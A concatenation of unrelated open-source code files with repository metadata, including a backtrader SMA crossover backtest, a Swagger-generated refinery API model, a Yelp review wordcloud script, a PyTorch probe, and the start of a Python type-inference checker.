if mode == tf.estimator.ModeKeys.TRAIN:
assert loss is not None, 'Need to pass `loss` arg.'
trainer = Trainer(update_batchnorm_params=True)
train_op = trainer.get_train_op(loss, use_tpu=FLAGS.use_tpu)
return spec_type(mode=mode, loss=loss, train_op=train_op)
raise ValueError('Unsupported mode %s' % mode)
|
google/revisiting-self-supervised
|
trainer.py
|
trainer.py
|
py
| 4,425 |
python
|
en
|
code
| 349 |
github-code
|
6
|
6605463296
|
from itertools import combinations
from collections import Counter
def solution(orders, course):
answer = []
for c in course:
temp = []
for order in orders:
combi = combinations(sorted(order), c)
temp += combi
counter = Counter(temp)
if len(counter) != 0 and max(counter.values()) != 1:
for cnt in counter:
if counter[cnt] == max(counter.values()):
answer.append("".join(cnt))
return sorted(answer)
|
JeongGod/Algo-study
|
3people/6week/p72411.py
|
p72411.py
|
py
| 457 |
python
|
en
|
code
| 7 |
github-code
|
6
|
17532275577
|
import backtrader as bt
import backtrader.analyzers as btanalyzers
import matplotlib
import matplotlib.dates as mdates
from matplotlib import pyplot as plt
from datetime import datetime
import pandas as pd
import datetime as dt
# Create a subclass of Strategy to define the indicators and logic
class SMA_CrossStrategy(bt.Strategy):
def __init__(self):
ma_fast = bt.ind.SMA(period = 9)
ma_slow = bt.ind.SMA(period = 21)
self.crossover = bt.ind.CrossOver(ma_fast, ma_slow)
def next(self):
if not self.position:
if self.crossover > 0:
self.buy()
elif self.crossover < 0:
self.close()
# def next(self):
# if not self.position:
# if self.crossover > 0:
# self.buy()
# elif self.crossover < 0:
# self.sell()
# elif self.crossover < 0:
# self.close()
def main():
cerebro = bt.Cerebro()
tickers_list = ['AAPL']
df_tic = pd.read_hdf("datasets/df_SnP_500_ohlcv.h5", "df", mode = 'r')
df_tic = df_tic[df_tic['tic'].isin(tickers_list)]
df_tic = df_tic.set_index('date')
# df_tic['date'] = pd.to_datetime(df_tic['date'])
print(df_tic.head(5))
data = bt.feeds.PandasData(dataname = df_tic,
# datetime=None,
open =1,
high=2,
low=3,
close=4,
volume=6,
openinterest=-1,
timeframe = bt.TimeFrame.Days,
fromdate=dt.datetime(2023, 1, 1), # Specify the start date
todate=dt.datetime(2023, 8, 24), # Specify the end date
)
# data = bt.feeds.YahooFinanceData(dataname = 'AAPL', fromdate = datetime(2010, 1, 1), todate = datetime(2020, 1, 1))
cerebro.adddata(data)
cerebro.addstrategy(SMA_CrossStrategy)
cerebro.broker.setcash(10000.0)
cerebro.addsizer(bt.sizers.PercentSizer, percents = 100)
cerebro.addanalyzer(btanalyzers.SharpeRatio, _name = "sharpe")
cerebro.addanalyzer(btanalyzers.Transactions, _name = "trans")
cerebro.addanalyzer(btanalyzers.TradeAnalyzer, _name = "trades")
back = cerebro.run()
cerebro.broker.getvalue()
back[0].analyzers.sharpe.get_analysis()
back[0].analyzers.trans.get_analysis()
back[0].analyzers.trades.get_analysis()
cerebro.plot(style='candlestick', barup='green', bardown='red')
plt.gca().xaxis.set_major_formatter(mdates.DateFormatter('%Y-%m-%d'))
plt.gcf().autofmt_xdate() # Rotates the date labels for better visibility
if __name__=="__main__":
main()
|
erkundanec/Trading_Strategies
|
04_Backtest_Backtrader_SMA_CrossOver.py
|
04_Backtest_Backtrader_SMA_CrossOver.py
|
py
| 3,013 |
python
|
en
|
code
| 0 |
github-code
|
6
|
26246786176
|
import argparse
import logging
from typing import List
import torch
import torch.nn as nn
from .probe_base import ProbeBase
logger = logging.getLogger(__name__)
class OneWordNNProbe(ProbeBase):
"""
Computes all squared L2 norm of n words as depths after an MLP projection.
Can be used for probing the depth of words in a tree
"""
def __init__(
self, model_hidden_dim: int, probe_hidden_layers: int, intermediate_dim: int
):
logging.info("Constructing OneWordNNDepthProbe")
super(OneWordNNProbe, self).__init__()
initial_linear = nn.Linear(model_hidden_dim, intermediate_dim)
intermediate_layers: List[nn.Module] = []
for i in range(probe_hidden_layers):
intermediate_layers.append(nn.Linear(intermediate_dim, intermediate_dim))
if i != probe_hidden_layers - 1:
intermediate_layers.append(nn.ReLU())
self.nn_probe = nn.Sequential(initial_linear, nn.ReLU(), *intermediate_layers)
def forward(self, batch):
"""
Computes all squared L2 norm of n words as depths after an MLP projection
for each sentence in a batch. predicts the depth through an MLP
Args:
batch: a batch of word representations of the shape
(batch_size, max_seq_len, representation_dim)
Returns: A tensor of depths of shape (batch_size, max_seq_len)
"""
batch = self.nn_probe(batch)
batchlen, seqlen, rank = batch.size()
norms = torch.bmm(
batch.view(batchlen * seqlen, 1, rank),
batch.view(batchlen * seqlen, rank, 1),
)
norms = norms.view(batchlen, seqlen)
return norms
@staticmethod
def add_probe_specific_args(
parent_parser: argparse.ArgumentParser,
) -> argparse.ArgumentParser:
parser = parent_parser.add_argument_group("ProbeArgs")
parser.add_argument(
"--probe_hidden_layers",
type=int,
default=2,
help="Number of laers in probe.",
)
parser.add_argument(
"--intermediate_dim",
type=int,
default=300,
help="Dimension the probe maps embeddings to.",
)
return parent_parser
|
VSJMilewski/multimodal-probes
|
probing_project/probes/one_word_nn_probe.py
|
one_word_nn_probe.py
|
py
| 2,291 |
python
|
en
|
code
| 10 |
github-code
|
6
|
19849966124
|
#7.7.1.py
# This program calculate sthe hourly rate and number of hours worked per week
def main():
print("This program gives wages earned in a week period.")
rate = float(input("What is the hourly rate? "))
numberHours = float(input("How many hours were worked? "))
# determines if overtime pay is included
if numberHours > 40:
pay = (numberHours-40) * (rate * 1.5) + 40 * rate
print(f"The total wages are {pay} dollars")
elif numberHours <= 40:
pay = numberHours * rate
print(f"The total wages are {pay} dollars")
else:
print("Something went wrong")
if __name__ == '__main__':
main()
|
mochapup/Python-Programming-2nd-edition-John-Zelle
|
7.7.1.py
|
7.7.1.py
|
py
| 661 |
python
|
en
|
code
| 1 |
github-code
|
6
|
43573832015
|
import argparse
from experiment.monitor import monitor
from apps.qe import qe
if __name__ == '__main__':
parser = argparse.ArgumentParser()
monitor.setup_run_args(parser)
qe.setup_run_args(parser)
args, extra_args = parser.parse_known_args()
app_conf = qe.QuantumEspressoAppConf(args.node_count, args.benchmark_name)
monitor.launch(app_conf=app_conf, args=args,
experiment_cli_args=extra_args)
|
geopm/geopm
|
integration/experiment/monitor/run_monitor_qe.py
|
run_monitor_qe.py
|
py
| 440 |
python
|
en
|
code
| 79 |
github-code
|
6
|
17233943864
|
# coding: utf-8
"""
Refinery Calc API Documentation
Integrate the powerful Refinery Calc Engine into your process using this API. # noqa: E501
OpenAPI spec version: 1.0
Contact: [email protected]
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
import pprint
import re # noqa: F401
import six
class OutputTypes(object):
"""NOTE: This class is auto generated by the swagger code generator program.
Do not edit the class manually.
"""
"""
Attributes:
swagger_types (dict): The key is attribute name
and the value is attribute type.
attribute_map (dict): The key is attribute name
and the value is json key in definition.
"""
swagger_types = {
'balance': 'list[OutputDetails]',
'complexity': 'list[OutputDetails]',
'constraints': 'list[OutputDetails]',
'crude_names': 'list[OutputDetails]',
'crude_percent': 'list[OutputDetails]',
'crude_pricing': 'list[OutputDetails]',
'crude_quality': 'list[OutputDetails]',
'crudes_and_feeds': 'list[OutputDetails]',
'delete_category': 'list[OutputDetails]',
'economics': 'list[OutputDetails]',
'end_points_f': 'list[OutputDetails]',
'expense_factors': 'list[OutputDetails]',
'fcc_hydrk_conv': 'list[OutputDetails]',
'feeds_pricing': 'list[OutputDetails]',
'gasoline_blending': 'list[OutputDetails]',
'general': 'list[OutputDetails]',
'hydrogen': 'list[OutputDetails]',
'product_pricing': 'list[OutputDetails]',
'products': 'list[OutputDetails]',
'refinery_layout_svg': 'list[OutputDetails]',
'sustainability': 'list[OutputDetails]',
'unit_balance': 'list[OutputDetails]'
}
attribute_map = {
'balance': 'balance',
'complexity': 'complexity',
'constraints': 'constraints',
'crude_names': 'crudeNames',
'crude_percent': 'crudePercent',
'crude_pricing': 'crudePricing',
'crude_quality': 'crudeQuality',
'crudes_and_feeds': 'crudesAndFeeds',
'delete_category': 'deleteCategory',
'economics': 'economics',
'end_points_f': 'endPointsF',
'expense_factors': 'expenseFactors',
'fcc_hydrk_conv': 'fccHydrkConv',
'feeds_pricing': 'feedsPricing',
'gasoline_blending': 'gasolineBlending',
'general': 'general',
'hydrogen': 'hydrogen',
'product_pricing': 'productPricing',
'products': 'products',
'refinery_layout_svg': 'refineryLayoutSVG',
'sustainability': 'sustainability',
'unit_balance': 'unitBalance'
}
def __init__(self, balance=None, complexity=None, constraints=None, crude_names=None, crude_percent=None, crude_pricing=None, crude_quality=None, crudes_and_feeds=None, delete_category=None, economics=None, end_points_f=None, expense_factors=None, fcc_hydrk_conv=None, feeds_pricing=None, gasoline_blending=None, general=None, hydrogen=None, product_pricing=None, products=None, refinery_layout_svg=None, sustainability=None, unit_balance=None): # noqa: E501
"""OutputTypes - a model defined in Swagger""" # noqa: E501
self._balance = None
self._complexity = None
self._constraints = None
self._crude_names = None
self._crude_percent = None
self._crude_pricing = None
self._crude_quality = None
self._crudes_and_feeds = None
self._delete_category = None
self._economics = None
self._end_points_f = None
self._expense_factors = None
self._fcc_hydrk_conv = None
self._feeds_pricing = None
self._gasoline_blending = None
self._general = None
self._hydrogen = None
self._product_pricing = None
self._products = None
self._refinery_layout_svg = None
self._sustainability = None
self._unit_balance = None
self.discriminator = None
if balance is not None:
self.balance = balance
if complexity is not None:
self.complexity = complexity
if constraints is not None:
self.constraints = constraints
if crude_names is not None:
self.crude_names = crude_names
if crude_percent is not None:
self.crude_percent = crude_percent
if crude_pricing is not None:
self.crude_pricing = crude_pricing
if crude_quality is not None:
self.crude_quality = crude_quality
if crudes_and_feeds is not None:
self.crudes_and_feeds = crudes_and_feeds
if delete_category is not None:
self.delete_category = delete_category
if economics is not None:
self.economics = economics
if end_points_f is not None:
self.end_points_f = end_points_f
if expense_factors is not None:
self.expense_factors = expense_factors
if fcc_hydrk_conv is not None:
self.fcc_hydrk_conv = fcc_hydrk_conv
if feeds_pricing is not None:
self.feeds_pricing = feeds_pricing
if gasoline_blending is not None:
self.gasoline_blending = gasoline_blending
if general is not None:
self.general = general
if hydrogen is not None:
self.hydrogen = hydrogen
if product_pricing is not None:
self.product_pricing = product_pricing
if products is not None:
self.products = products
if refinery_layout_svg is not None:
self.refinery_layout_svg = refinery_layout_svg
if sustainability is not None:
self.sustainability = sustainability
if unit_balance is not None:
self.unit_balance = unit_balance
@property
def balance(self):
"""Gets the balance of this OutputTypes. # noqa: E501
:return: The balance of this OutputTypes. # noqa: E501
:rtype: list[OutputDetails]
"""
return self._balance
@balance.setter
def balance(self, balance):
"""Sets the balance of this OutputTypes.
:param balance: The balance of this OutputTypes. # noqa: E501
:type: list[OutputDetails]
"""
self._balance = balance
@property
def complexity(self):
"""Gets the complexity of this OutputTypes. # noqa: E501
:return: The complexity of this OutputTypes. # noqa: E501
:rtype: list[OutputDetails]
"""
return self._complexity
@complexity.setter
def complexity(self, complexity):
"""Sets the complexity of this OutputTypes.
:param complexity: The complexity of this OutputTypes. # noqa: E501
:type: list[OutputDetails]
"""
self._complexity = complexity
@property
def constraints(self):
"""Gets the constraints of this OutputTypes. # noqa: E501
:return: The constraints of this OutputTypes. # noqa: E501
:rtype: list[OutputDetails]
"""
return self._constraints
@constraints.setter
def constraints(self, constraints):
"""Sets the constraints of this OutputTypes.
:param constraints: The constraints of this OutputTypes. # noqa: E501
:type: list[OutputDetails]
"""
self._constraints = constraints
@property
def crude_names(self):
"""Gets the crude_names of this OutputTypes. # noqa: E501
:return: The crude_names of this OutputTypes. # noqa: E501
:rtype: list[OutputDetails]
"""
return self._crude_names
@crude_names.setter
def crude_names(self, crude_names):
"""Sets the crude_names of this OutputTypes.
:param crude_names: The crude_names of this OutputTypes. # noqa: E501
:type: list[OutputDetails]
"""
self._crude_names = crude_names
@property
def crude_percent(self):
"""Gets the crude_percent of this OutputTypes. # noqa: E501
:return: The crude_percent of this OutputTypes. # noqa: E501
:rtype: list[OutputDetails]
"""
return self._crude_percent
@crude_percent.setter
def crude_percent(self, crude_percent):
"""Sets the crude_percent of this OutputTypes.
:param crude_percent: The crude_percent of this OutputTypes. # noqa: E501
:type: list[OutputDetails]
"""
self._crude_percent = crude_percent
@property
def crude_pricing(self):
"""Gets the crude_pricing of this OutputTypes. # noqa: E501
:return: The crude_pricing of this OutputTypes. # noqa: E501
:rtype: list[OutputDetails]
"""
return self._crude_pricing
@crude_pricing.setter
def crude_pricing(self, crude_pricing):
"""Sets the crude_pricing of this OutputTypes.
:param crude_pricing: The crude_pricing of this OutputTypes. # noqa: E501
:type: list[OutputDetails]
"""
self._crude_pricing = crude_pricing
@property
def crude_quality(self):
"""Gets the crude_quality of this OutputTypes. # noqa: E501
:return: The crude_quality of this OutputTypes. # noqa: E501
:rtype: list[OutputDetails]
"""
return self._crude_quality
@crude_quality.setter
def crude_quality(self, crude_quality):
"""Sets the crude_quality of this OutputTypes.
:param crude_quality: The crude_quality of this OutputTypes. # noqa: E501
:type: list[OutputDetails]
"""
self._crude_quality = crude_quality
@property
def crudes_and_feeds(self):
"""Gets the crudes_and_feeds of this OutputTypes. # noqa: E501
:return: The crudes_and_feeds of this OutputTypes. # noqa: E501
:rtype: list[OutputDetails]
"""
return self._crudes_and_feeds
@crudes_and_feeds.setter
def crudes_and_feeds(self, crudes_and_feeds):
"""Sets the crudes_and_feeds of this OutputTypes.
:param crudes_and_feeds: The crudes_and_feeds of this OutputTypes. # noqa: E501
:type: list[OutputDetails]
"""
self._crudes_and_feeds = crudes_and_feeds
@property
def delete_category(self):
"""Gets the delete_category of this OutputTypes. # noqa: E501
:return: The delete_category of this OutputTypes. # noqa: E501
:rtype: list[OutputDetails]
"""
return self._delete_category
@delete_category.setter
def delete_category(self, delete_category):
"""Sets the delete_category of this OutputTypes.
:param delete_category: The delete_category of this OutputTypes. # noqa: E501
:type: list[OutputDetails]
"""
self._delete_category = delete_category
@property
def economics(self):
"""Gets the economics of this OutputTypes. # noqa: E501
:return: The economics of this OutputTypes. # noqa: E501
:rtype: list[OutputDetails]
"""
return self._economics
@economics.setter
def economics(self, economics):
"""Sets the economics of this OutputTypes.
:param economics: The economics of this OutputTypes. # noqa: E501
:type: list[OutputDetails]
"""
self._economics = economics
@property
def end_points_f(self):
"""Gets the end_points_f of this OutputTypes. # noqa: E501
:return: The end_points_f of this OutputTypes. # noqa: E501
:rtype: list[OutputDetails]
"""
return self._end_points_f
@end_points_f.setter
def end_points_f(self, end_points_f):
"""Sets the end_points_f of this OutputTypes.
:param end_points_f: The end_points_f of this OutputTypes. # noqa: E501
:type: list[OutputDetails]
"""
self._end_points_f = end_points_f
@property
def expense_factors(self):
"""Gets the expense_factors of this OutputTypes. # noqa: E501
:return: The expense_factors of this OutputTypes. # noqa: E501
:rtype: list[OutputDetails]
"""
return self._expense_factors
@expense_factors.setter
def expense_factors(self, expense_factors):
"""Sets the expense_factors of this OutputTypes.
:param expense_factors: The expense_factors of this OutputTypes. # noqa: E501
:type: list[OutputDetails]
"""
self._expense_factors = expense_factors
@property
def fcc_hydrk_conv(self):
"""Gets the fcc_hydrk_conv of this OutputTypes. # noqa: E501
:return: The fcc_hydrk_conv of this OutputTypes. # noqa: E501
:rtype: list[OutputDetails]
"""
return self._fcc_hydrk_conv
@fcc_hydrk_conv.setter
def fcc_hydrk_conv(self, fcc_hydrk_conv):
"""Sets the fcc_hydrk_conv of this OutputTypes.
:param fcc_hydrk_conv: The fcc_hydrk_conv of this OutputTypes. # noqa: E501
:type: list[OutputDetails]
"""
self._fcc_hydrk_conv = fcc_hydrk_conv
@property
def feeds_pricing(self):
"""Gets the feeds_pricing of this OutputTypes. # noqa: E501
:return: The feeds_pricing of this OutputTypes. # noqa: E501
:rtype: list[OutputDetails]
"""
return self._feeds_pricing
@feeds_pricing.setter
def feeds_pricing(self, feeds_pricing):
"""Sets the feeds_pricing of this OutputTypes.
:param feeds_pricing: The feeds_pricing of this OutputTypes. # noqa: E501
:type: list[OutputDetails]
"""
self._feeds_pricing = feeds_pricing
@property
def gasoline_blending(self):
"""Gets the gasoline_blending of this OutputTypes. # noqa: E501
:return: The gasoline_blending of this OutputTypes. # noqa: E501
:rtype: list[OutputDetails]
"""
return self._gasoline_blending
@gasoline_blending.setter
def gasoline_blending(self, gasoline_blending):
"""Sets the gasoline_blending of this OutputTypes.
:param gasoline_blending: The gasoline_blending of this OutputTypes. # noqa: E501
:type: list[OutputDetails]
"""
self._gasoline_blending = gasoline_blending
@property
def general(self):
"""Gets the general of this OutputTypes. # noqa: E501
:return: The general of this OutputTypes. # noqa: E501
:rtype: list[OutputDetails]
"""
return self._general
@general.setter
def general(self, general):
"""Sets the general of this OutputTypes.
:param general: The general of this OutputTypes. # noqa: E501
:type: list[OutputDetails]
"""
self._general = general
@property
def hydrogen(self):
"""Gets the hydrogen of this OutputTypes. # noqa: E501
:return: The hydrogen of this OutputTypes. # noqa: E501
:rtype: list[OutputDetails]
"""
return self._hydrogen
@hydrogen.setter
def hydrogen(self, hydrogen):
"""Sets the hydrogen of this OutputTypes.
:param hydrogen: The hydrogen of this OutputTypes. # noqa: E501
:type: list[OutputDetails]
"""
self._hydrogen = hydrogen
@property
def product_pricing(self):
"""Gets the product_pricing of this OutputTypes. # noqa: E501
:return: The product_pricing of this OutputTypes. # noqa: E501
:rtype: list[OutputDetails]
"""
return self._product_pricing
@product_pricing.setter
def product_pricing(self, product_pricing):
"""Sets the product_pricing of this OutputTypes.
:param product_pricing: The product_pricing of this OutputTypes. # noqa: E501
:type: list[OutputDetails]
"""
self._product_pricing = product_pricing
@property
def products(self):
"""Gets the products of this OutputTypes. # noqa: E501
:return: The products of this OutputTypes. # noqa: E501
:rtype: list[OutputDetails]
"""
return self._products
@products.setter
def products(self, products):
"""Sets the products of this OutputTypes.
:param products: The products of this OutputTypes. # noqa: E501
:type: list[OutputDetails]
"""
self._products = products
@property
def refinery_layout_svg(self):
"""Gets the refinery_layout_svg of this OutputTypes. # noqa: E501
:return: The refinery_layout_svg of this OutputTypes. # noqa: E501
:rtype: list[OutputDetails]
"""
return self._refinery_layout_svg
@refinery_layout_svg.setter
def refinery_layout_svg(self, refinery_layout_svg):
"""Sets the refinery_layout_svg of this OutputTypes.
:param refinery_layout_svg: The refinery_layout_svg of this OutputTypes. # noqa: E501
:type: list[OutputDetails]
"""
self._refinery_layout_svg = refinery_layout_svg
@property
def sustainability(self):
"""Gets the sustainability of this OutputTypes. # noqa: E501
:return: The sustainability of this OutputTypes. # noqa: E501
:rtype: list[OutputDetails]
"""
return self._sustainability
@sustainability.setter
def sustainability(self, sustainability):
"""Sets the sustainability of this OutputTypes.
:param sustainability: The sustainability of this OutputTypes. # noqa: E501
:type: list[OutputDetails]
"""
self._sustainability = sustainability
@property
def unit_balance(self):
"""Gets the unit_balance of this OutputTypes. # noqa: E501
:return: The unit_balance of this OutputTypes. # noqa: E501
:rtype: list[OutputDetails]
"""
return self._unit_balance
@unit_balance.setter
def unit_balance(self, unit_balance):
"""Sets the unit_balance of this OutputTypes.
:param unit_balance: The unit_balance of this OutputTypes. # noqa: E501
:type: list[OutputDetails]
"""
self._unit_balance = unit_balance
def to_dict(self):
"""Returns the model properties as a dict"""
result = {}
for attr, _ in six.iteritems(self.swagger_types):
value = getattr(self, attr)
if isinstance(value, list):
result[attr] = list(map(
lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
value
))
elif hasattr(value, "to_dict"):
result[attr] = value.to_dict()
elif isinstance(value, dict):
result[attr] = dict(map(
lambda item: (item[0], item[1].to_dict())
if hasattr(item[1], "to_dict") else item,
value.items()
))
else:
result[attr] = value
if issubclass(OutputTypes, dict):
for key, value in self.items():
result[key] = value
return result
def to_str(self):
"""Returns the string representation of the model"""
return pprint.pformat(self.to_dict())
def __repr__(self):
"""For `print` and `pprint`"""
return self.to_str()
def __eq__(self, other):
"""Returns true if both objects are equal"""
if not isinstance(other, OutputTypes):
return False
return self.__dict__ == other.__dict__
def __ne__(self, other):
"""Returns true if both objects are not equal"""
return not self == other
|
refinerycalc/sdk-example-python
|
python/refinerycalc/models/output_types.py
|
output_types.py
|
py
| 19,790 |
python
|
en
|
code
| 0 |
github-code
|
6
|
6173790975
|
import csv
import sqlite3
import numpy as np
import pandas as pd
from nltk.stem.porter import *
from nltk.tokenize import word_tokenize
from nltk.corpus import stopwords
import string
from PIL import Image
from os import path
import matplotlib.pyplot as plt
import matplotlib as mpl
import pickle
from sklearn.svm import LinearSVC
from sklearn.feature_extraction.text import TfidfVectorizer
from wordcloud import WordCloud, STOPWORDS
from collections import Counter
from nltk.stem import SnowballStemmer
from nltk.stem import WordNetLemmatizer
stemmer = SnowballStemmer('english')
wordnet_lemmatizer = WordNetLemmatizer()
#############################In/out############################
def open_file(csvfile):
reader = pd.read_csv(csvfile)
return reader
def output_file(df,string):
df.to_csv(string, index = False)
#############################Word Cloud & Feature Extraction############################
def text_process(data):
'''
Takes in a df in format of [text,stars] performs the following:
1. Lower capital letters
2. Remove all punctuation
3. Remove all stopwords
4. Reduce words to their word stem
5. Return a list of words
'''
for i in range(len(data)):
line = data[i]
line = line.lower() # lower case
translation = str.maketrans("", "", string.punctuation);
line = line.translate(translation)
split = word_tokenize(line)
# filter out any tokens not containing letters (e.g., numeric tokens, raw punctuation)
filtered = []
for token in split:
if re.search('[a-zA-Z]', token):
filtered.append(token)
word = [i for i in filtered if i not in stopwords.words('english')]
d = [stemmer.stem(word) for word in word]
d = [wordnet_lemmatizer.lemmatize(word) for word in d]
data[i] = d
return data
def top_words(business_id,review_ml ):
train = review_ml[review_ml['business_id'] == business_id][review_ml['True(1)/Deceptive(0)'] == 'True']
text = list(train['Review']) # text
text = text_process(text)
text = sum(text, [])
counts = Counter(text)
wordcloud = WordCloud(
background_color='white',
max_words=100,
max_font_size=50,
min_font_size=10,
random_state=40,
).fit_words(counts)
fig = plt.figure(1)
plt.imshow(wordcloud)
plt.axis('off') # remove axis
plt.show()
def change_label(x):
for i in range(len(x)):
if x[i] >= 3.0: # good review: stars >=3.0
x[i] = 1
else: # bad review: stars 3.0
x[i] = 0
return x
def bigram(business_id, review_ml):
# only use true review
train0 = review_ml[review_ml['business_id'] == business_id]
train = train0[train0['True(1)/Deceptive(0)'] == 'True']
#print(train.head())
#train_data = list(train['Review']) # text
label = list(train['Stars']) # ratings
#print(label)
train_label = change_label(label)
#print(train_label)
# TfidfVectorizer Transform
transformer = TfidfVectorizer(stop_words='english',
ngram_range=(2, 2)) # "ignore terms that appear in less than 1% of the documents".
#print(transformer)
cvectorizer = transformer.fit(train['Review'])
#print(cvectorizer)
transformed = cvectorizer.transform(train['Review'])
#print(transformed)
# SVM regression
clf = LinearSVC()
clf.fit(transformed, train_label)
coefficients = clf.coef_.ravel()
#print(coefficients)
pos_coefficients = np.argsort(coefficients)[-10:]
neg_coefficients = np.argsort(coefficients)[:10]
combine = np.hstack([neg_coefficients, pos_coefficients])
#print("combine:, ",combine)
#print("coefficients[combine]: ", coefficients[combine])
plt.figure(figsize=(7, 4))
#print("fisnish 1")
colors = ['red' if i < 0 else 'blue' for i in coefficients[combine]]
#print("finish 2")
plt.bar(np.arange(len(coefficients[combine])), coefficients[combine], color=colors)
#print("finish 3")
feature_names = np.array(cvectorizer.get_feature_names())
#print("finish 4")
plt.title('why the restaurant is rated as bad or good ', fontsize=15)
#print("finish 5")
plt.xticks(np.arange(0, 2 * 10), feature_names[combine], rotation=40, ha='right')
#print("finish 6")
plt.show()
#print("finish 7")
#############################helper function#############################
def load_database_data(c, zipcode, business_name_input):
c.execute('''
SELECT b_id,r.review, r.r_stars
FROM business, review_fact_table r
WHERE postal_code = ? AND name = ? AND r.business_id = b_id''', (zipcode, business_name_input,))
dataframe = pd.DataFrame(data=c.fetchall(), columns=['business_id', 'review', 'rating'])
return dataframe
def select_data(c, zipcode, business_name):
c.execute('''
SELECT DISTINCT(b_id)
FROM business, review_fact_table r
WHERE postal_code = ? AND name = ? AND r.business_id = b_id''', (zipcode, business_name,))
single_df = pd.DataFrame(data=c.fetchall(), columns=['business_id'])
return single_df['business_id'][0]
def fake_ratio(predict, single):
# Load fake results
predicted_fake = predict
# reviews that has only that business id
reviews = predicted_fake[predicted_fake['business_id'] == single]
n = reviews.shape[0]
# print(n)
fake = reviews.groupby('True(1)/Deceptive(0)').count()['Review'][0]
# print(fake)
fake_percentage = fake / n
# print(fake_percentage)
return fake_percentage
##############################main######################################
def main():
#open states and income raw data
zipcode = input("zipcode:")
business_name = input("restaurant name:")
print(zipcode,business_name)
conn = sqlite3.connect('yelp.db')
c = conn.cursor()
predicted_fake = open_file('data/predicted_review.csv')
# find the business id
single = select_data(c, zipcode, business_name)
# print(single)
fake_review_ratio = fake_ratio(predicted_fake,single)
print(fake_review_ratio)
#top_words(single, predicted_fake)
bigram(single, predicted_fake)
#if __name__=="__main__":
#main()
main()
|
zzhang83/Yelp_Sentiment_Analysis
|
Scripts/UI.py
|
UI.py
|
py
| 6,335 |
python
|
en
|
code
| 20 |
github-code
|
6
|
71568070268
|
nums = []
user_input = input('Enter numbers: ')
while (user_input != 'exit'):
nums.append(user_input)
user_input = input('Enter numbers: ')
#tokens = user_input.split() # converts numbers to string
# # Convert strings to integers
# nums = []
# for token in tokens:
# nums.append(token)
print(nums)
#
# # Print each position and number
print()
for pos, val in enumerate(nums):
print('{}: {}'.format(pos, val))
#
# # Change negative values to 0
for pos in range(len(nums)):
if int(nums[pos]) < 0:
nums[pos] = 0
# Print new numbers
print('New numbers: ')
for num in nums:
print(num, end=' | ')
print()
nums1 = [50, 10, -5, -4, 6]
for i in range(len(nums1)):
if nums1[i] < 0:
nums1[i] = 0
print("nums1:", nums1)
|
Git-Pierce/Week8
|
ModifyList.py
|
ModifyList.py
|
py
| 757 |
python
|
en
|
code
| 0 |
github-code
|
6
|
27624326992
|
import ast
import logging
from util import cname, slice_range, node_is_int, valid_int_slice
from errors import TypeUnspecifiedError
from ptype import PType
from settings import DEBUG_INFER
# Need to use this form to resolve circular import.
import check
int_t = PType.int()
float_t = PType.float()
bool_t = PType.bool()
str_t = PType.string()
unicode_t = PType.unicode()
unit_t = PType.unit()
log = None
def i_debug(s, cond=True):
log.debug(s, DEBUG_INFER and cond)
def call_function(fun_name, *args, **kwargs):
return globals()[fun_name](*args, **kwargs)
def env_get(env, var_id):
"""
Look up the PType stored for identifier `var_id` in type environment
`env`. Returns a PType. Raises `TypeUnspecifiedError` if `env` does not
contain `var_id`.
- `env`: dictionary mapping strings to PTypes.
- `var_id`: string representing identifier.
"""
# make sure the variable is in the environment
if var_id not in env:
i_debug("Type of %s not found in %s" % (var_id, env))
raise TypeUnspecifiedError(var=var_id,env=env)
# return the type stored in the environment
return env[var_id]
def infer_expr(e, env):
"""
Use limited type inference to determine the type of AST expression `e` under
type environment `env`.
"""
assert isinstance(e, ast.expr), \
"Should be inferring type of an expr node, not a " + cname(e)
n = get_infer_expr_func_name(e.__class__.__name__)
# If we get a KeyError, then we're trying to infer the type of an AST node
# that is not in the very limited subset of the language that we're trying
# to perform type inference on.
return call_function(n, e, env)
def get_infer_expr_func_name(expr_type):
return "infer_%s_expr" % expr_type
def infer_Num_expr(num, env):
"""
Determine the type of AST `Num` expression under type environment `env`.
`ast.Num`
- `n`: the numeric literal (as a Python object)
"""
assert num.__class__ is ast.Num
n = num.n
if type(n) is int:
# (int) assignment rule.
return int_t
elif type(n) is float:
# (flt) assignment rule.
return float_t
else:
# No type assignment rule found.
return None
def infer_Str_expr(s, env):
"""
Determine the type of AST `Str` expression under type environment `env`.
`ast.Str`
- `s`: the string literal (as a Python object)
"""
assert s.__class__ is ast.Str
the_string = s.s
if type(the_string) is str:
# (str) assignment rule.
return str_t
elif type(the_string) is unicode:
# (ustr) assignment rule.
return unicode_t
else:
# No type assignment rule found..
return None
def infer_Name_expr(name, env):
"""
Determine the type of AST `Name` expression under type environment `env`.
`ast.Name`
- `id`: the identifier (as a Python `str`)
- `ctx`: the context (e.g., load, store) in which the expr is used
The AST treats `True` and `False` as Name nodes with id of `"True"` or
`"False"`, strangely enough.
"""
assert name.__class__ is ast.Name
id_str = name.id
if id_str == 'True' or id_str == 'False':
# (bool) assignment rule.
return bool_t
elif id_str == 'None':
# (none) assignment rule.
return unit_t
else:
# (idn) assignment rule.
return env_get(env, id_str)
def infer_List_expr(lst, env):
"""
Determine the type of AST `List` expression under type environment `env`.
`ast.List`
- `elts`: Python list of contained expr nodes
- `ctx': context of the expr (e.g., load, store)
"""
assert lst.__class__ is ast.List
elts_list = lst.elts
first_type = infer_expr(elts_list[0], env)
if all(check.check_expr(e, first_type, env) for e in elts_list[1:]):
# (lst) assignment rule.
return PType.list(first_type)
else:
# No assignment rule found.
return None
def infer_Tuple_expr(tup, env):
"""
Determine the type of AST `Tuple` expression under type environment `env`.
`ast.Tuple`
- `elts`: Python list of contained expr nodes
- `ctx`: context of the expr (e.g., load, store)
"""
assert tup.__class__ is ast.Tuple
elts_list = tup.elts
if all(infer_expr(e, env) != None for e in elts_list):
# (tup) assignment rule.
return PType.tuple([infer_expr(e, env) for e in elts_list])
else:
# No assignment rule found.
return None
def infer_Subscript_expr(subs, env):
"""
Determine the type of AST `Subscript` expression under type environment
`env`.
`ast.Subscript`
- `value`: the collection being subscripted
- `slice`: `ast.Index` or `ast.Slice`
+ `value`: expr used as index (if `ast.Index`)
+ `lower`: expr used as lower bound (if `ast.Slice`)
+ `upper`: expr used as upper bound (if `ast.Slice`)
+ `step`: expr used as step (if `ast.Slice`)
We can only subscript tuples with numeric literals because the inference
algorithm needs to actually know the values of the subscript parameters.
"""
assert subs.__class__ is ast.Subscript
col = subs.value
col_t = infer_expr(col, env)
is_index = subs.slice.__class__ is ast.Index
